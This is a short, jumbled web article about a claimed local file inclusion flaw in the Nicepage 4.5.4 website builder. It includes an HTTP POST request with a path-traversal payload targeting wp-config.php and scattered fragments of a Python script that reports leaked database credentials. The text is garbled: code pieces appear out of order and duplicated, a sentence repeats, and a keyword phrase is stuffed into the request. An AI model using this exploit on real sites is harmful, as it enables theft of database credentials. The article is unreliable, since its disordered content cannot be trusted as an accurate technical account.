Introduction In the ever-evolving landscape of web development, drag-and-drop builders have become a staple for rapid prototyping and deployment. Nicepage, a popular responsive website builder used by over 2 million users, has been a go-to tool for creating WordPress and HTML sites. However, with popularity comes scrutiny. In late 2023, security researchers identified a critical vulnerability in Nicepage version 4.5.4 —a flaw that opened the door to unauthenticated remote code execution (RCE) and local file inclusion (LFI).
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target-site.com Content-Type: application/x-www-form-urlencoded action=nicepage_activate_theme&template=../../../../wp-config.php%00 nicepage 4.5.4 exploit
if "DB_NAME" in r.text: print("[!] Exploit successful! Database credentials leaked.") print(r.text[:500]) else: print("[-] Target may be patched.") In late 2023, security researchers identified a critical
import requests target = "http://victim-site.com" payload = "../../../../wp-config.php" data = { "action": "nicepage_activate_theme"
r = requests.post(f"{target}/wp-admin/admin-ajax.php", data=data)
This article dissects the technical specifics of the Nicepage 4.5.4 exploit, how it works, the potential impact on live servers, and the steps to mitigate it.
data = { "action": "nicepage_activate_theme", "template": payload }